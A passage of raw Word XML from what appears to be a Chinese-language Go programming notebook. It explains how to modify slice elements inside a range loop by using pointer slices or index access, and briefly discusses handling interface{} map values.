        <w:tab/>
        <w:t>v[3] = c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065FEEDC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>getAll(v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B21B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28289736" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383DBB86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334FD368" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186DFA73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2DD40F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="_Toc159779770"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环中修改数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切片内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>
    </w:p>
    <w:p w14:paraId="4F2D2BD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/weixin_44058932/article/details/113368976</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12F71878" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C726CC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表或者切片：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> k,v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下标和值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC36562" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map[string]interface{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">k,v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1533B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6D1E5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用指针数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432A271" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>让数据结构中的元素都存储为指针类型，这样在进行修改的时候，就是对地址上的值进行修改，毕竟指针就是一个地址，拷贝出来的指针仍然指向同一块空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258E758F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6540C4BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type Person struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8860B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>id int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CAFF62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>age int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B40C99" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63541F30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3D4F37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414B9D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>看这里，首先这是个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> [] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>，单个元素是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> *Person ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>所以类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> []*Person</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A292951" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>再后面是初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> {{}, {}, {}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这个样子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822F094" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>persons := []*Person{{1, 10}, {2, 20}, {3, 30}, {4, 40}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7423AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, p := range persons {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05896963" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>if p.id == 3 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C9DA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这里进行遍历的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>操作的直接就是指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5913B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>p.age = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36554917" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1BE64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F51BD4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, p := range persons {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD7E494" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68CA39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522B8FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F71F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第一个返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1162EE97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type Person struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B67C7A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>id int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77627534" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>age int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1737468D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A5009" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FD47AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB3B2F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>persons := []Person{{1, 10}, {2, 20}, {3, 30}, {4, 40}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE52530" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>遍历的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> _,v := range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>其中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> _ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>往往指表示数组下标的索引值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D08784" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>for i, p := range persons {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEBAE11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>if p.id == 3 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E819737" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>persons[i].age = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C931F67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43288729" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D61A72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, p := range persons {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C14622" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC3B1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B64297D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C988078" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7185502F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc159779771"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>涉及不太好处理的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型或者列表类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p w14:paraId="22621E0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为可以变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> map[string]interface{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">interface{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型不好变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29279FAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以建议弄一个中间变量来进行赋值传递</w:t>
      </w:r>
    </w:p>
